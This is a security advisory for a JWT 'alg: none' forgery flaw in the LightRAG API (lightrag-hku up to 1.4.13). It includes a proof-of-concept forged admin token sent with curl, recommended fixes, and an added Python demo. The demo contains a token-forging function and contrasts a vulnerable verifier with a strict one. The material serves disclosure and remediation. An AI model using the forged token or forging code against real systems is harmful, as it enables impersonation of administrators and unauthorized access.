LightRAG JWT Algorithm Forgery Allows Unauthorized Access
GHSA-8ffj-4hx4-9pgf
CVE-2026-39413
Summary
The LightRAG API accepts forged login tokens. Its JWT validation does not pin the signing algorithm it will accept, so a token declaring the 'none' algorithm, which carries no signature at all, can pass as valid and give an attacker access to protected resources without a valid account. The fix is to state explicitly which signing algorithms are accepted and never to include 'none' among them.
What to do
- Update lightrag-hku to version 1.4.14.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | lightrag-hku | <= 1.4.13 | 1.4.14 |
Original title
lightrag-hku: JWT Algorithm Confusion Vulnerability
Original description
## Summary
The LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the `jwt.decode()` call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access.
## Details
In `lightrag/api/auth.py` at line 128, the `validate_token` method calls:
```python
payload = jwt.decode(token, self.secret, algorithms=[self.algorithm])
```
PyJWT verifies only against the algorithms named in that list, so the check is exactly as strong as the runtime value of `self.algorithm`; nothing in the call itself rules 'none' out. When the allow-list admits 'none', a token whose header declares `"alg": "none"` and whose signature segment is empty is accepted with no signature verification at all, and authentication is bypassed.
## PoC
An attacker can generate a JWT with the following structure:
```json
{
"header": {
"alg": "none",
"typ": "JWT"
},
"payload": {
"sub": "admin",
"exp": 1700000000,
"role": "admin"
}
}
```
Then send a request like:
```bash
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://localhost:8000/api/protected-endpoint
```
## Impact
An attacker can impersonate any user, including administrators, by forging a JWT with 'alg': 'none', gaining full access to protected resources without needing valid credentials.
## Recommended Fix
Explicitly specify allowed algorithms and exclude 'none'. Modify the `validate_token` method to:
```python
allowed_algorithms = [self.algorithm] if self.algorithm != 'none' else ['HS256', 'HS384', 'HS512']
payload = jwt.decode(token, self.secret, algorithms=allowed_algorithms)
```
Or better yet, hardcode the expected algorithm(s):
```python
payload = jwt.decode(token, self.secret, algorithms=['HS256'])
```
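The PoC token above and the pinned-allow-list fix, reproduced in one stand-alone model. This is an added example, not LightRAG code and not PyJWT: it implements just enough of JWT (base64url segments, HMAC-SHA2 signatures, an `exp` check) to show a lax verifier that honours the token's own `alg` header accepting the advisory's exact unsigned token, next to a strict verifier whose allow-list is chosen by the server and which treats a configured 'none' as a startup error. `SECRET`, `PAGE_TOKEN`, `lax_decode`, `strict_decode`, `forge_none_token`, `sign_token` and `demo` are names invented here, and the secret is constructed. One caveat for anyone reproducing the PoC: its payload carries `exp` 1700000000 (14 November 2023), so any verifier that checks expiry rejects it regardless of the algorithm bug; the demo therefore fixes the clock with a `now` argument just before that instant, and a live test needs a future `exp`.

```python
"""Added example (not LightRAG or PyJWT code): the 'alg: none' bypass and its fix."""
import base64
import hashlib
import hmac
import json
import time

HS_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}

# The exact unsigned token from the advisory's PoC: header {"alg":"none","typ":"JWT"},
# payload {"sub":"admin","exp":1700000000,"role":"admin"}, empty third segment.
PAGE_TOKEN = ("eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0."
              "eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0.")
SECRET = b"constructed-demo-secret"  # constructed for this example; the attacker never learns it


class InvalidTokenError(ValueError):
    """Raised when a token fails structural, signature or expiry checks."""


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _encode_json(obj: dict) -> str:
    # Compact separators reproduce the canonical form used in the PoC token.
    return _b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def _split(token: str):
    parts = token.split(".")
    if len(parts) != 3:
        raise InvalidTokenError("token must have exactly three segments")
    return parts[0], parts[1], parts[2]


def _hmac(header_b64: str, payload_b64: str, secret: bytes, alg: str) -> bytes:
    return hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), HS_ALGS[alg]).digest()


def _check_exp(payload: dict, now) -> None:
    now = time.time() if now is None else now
    if "exp" in payload and now >= payload["exp"]:
        raise InvalidTokenError("token expired")


def sign_token(payload: dict, secret: bytes, alg: str = "HS256") -> str:
    """Server side: issue a properly signed token."""
    header_b64, payload_b64 = _encode_json({"alg": alg, "typ": "JWT"}), _encode_json(payload)
    return f"{header_b64}.{payload_b64}.{_b64url_encode(_hmac(header_b64, payload_b64, secret, alg))}"


def forge_none_token(payload: dict) -> str:
    """Attacker side: no key needed, the signature segment is simply left empty."""
    return f"{_encode_json({'alg': 'none', 'typ': 'JWT'})}.{_encode_json(payload)}."


def lax_decode(token: str, secret: bytes, now=None) -> dict:
    """Vulnerable verifier: does whatever the token's own header says, 'none' included."""
    header_b64, payload_b64, sig_b64 = _split(token)
    alg = json.loads(_b64url_decode(header_b64)).get("alg")
    if alg == "none":
        if sig_b64 != "":
            raise InvalidTokenError("'none' token must carry an empty signature")
    elif alg in HS_ALGS:
        if not hmac.compare_digest(_b64url_decode(sig_b64), _hmac(header_b64, payload_b64, secret, alg)):
            raise InvalidTokenError("signature mismatch")
    else:
        raise InvalidTokenError(f"unsupported alg {alg!r}")
    payload = json.loads(_b64url_decode(payload_b64))
    _check_exp(payload, now)
    return payload


def strict_decode(token: str, secret: bytes, algorithms=("HS256",), now=None) -> dict:
    """Fixed verifier: the server pins the allow-list; 'none' is a configuration error, not an option."""
    allowed = set(algorithms)
    if not allowed or "none" in allowed or not allowed <= set(HS_ALGS):
        raise ValueError("allowed algorithms must be a non-empty subset of HS256/HS384/HS512")
    header_b64, payload_b64, sig_b64 = _split(token)
    alg = json.loads(_b64url_decode(header_b64)).get("alg")
    if alg not in allowed:  # decided by the server before any signature work
        raise InvalidTokenError(f"alg {alg!r} not in server allow-list")
    if not hmac.compare_digest(_b64url_decode(sig_b64), _hmac(header_b64, payload_b64, secret, alg)):
        raise InvalidTokenError("signature mismatch")
    payload = json.loads(_b64url_decode(payload_b64))
    _check_exp(payload, now)
    return payload


def _outcome(fn, *args, **kwargs) -> str:
    try:
        return "accepted as " + repr(fn(*args, **kwargs).get("sub"))
    except ValueError as exc:  # InvalidTokenError is a ValueError too
        return f"rejected: {exc}"


def demo(now: int = 1_699_999_999) -> dict:
    """Run every case with the clock fixed just before the PoC token's exp (1700000000)."""
    forged = forge_none_token({"sub": "admin", "exp": 1700000000, "role": "admin"})
    legit = sign_token({"sub": "alice", "exp": now + 300}, SECRET)
    return {
        "forged_matches_advisory_token": forged == PAGE_TOKEN,
        "lax_on_forged": _outcome(lax_decode, forged, SECRET, now=now),
        "strict_on_forged": _outcome(strict_decode, forged, SECRET, now=now),
        "strict_on_legit": _outcome(strict_decode, legit, SECRET, now=now),
        "strict_misconfigured_none": _outcome(strict_decode, legit, SECRET, algorithms=("none",), now=now),
        "lax_on_forged_after_exp": _outcome(lax_decode, forged, SECRET, now=1_700_000_000),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:32} {result}")
```

Running the file prints one line per case: the forged token is byte-for-byte the advisory's, `lax_decode` accepts it as `admin` with no key involved, `strict_decode` rejects it on the algorithm check before touching the signature, the legitimately signed token still passes the strict verifier, and a deployment that configures 'none' fails closed instead of silently accepting unsigned tokens. The last case shows why the PoC token as printed would be rejected on a live system today: its `exp` has passed.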
CVSS 3.1 (GHSA): 4.2
Vulnerability type
CWE-347
Improper Verification of Cryptographic Signature
Published: 8 Apr 2026 · Updated: 8 Apr 2026 · First seen: 8 Apr 2026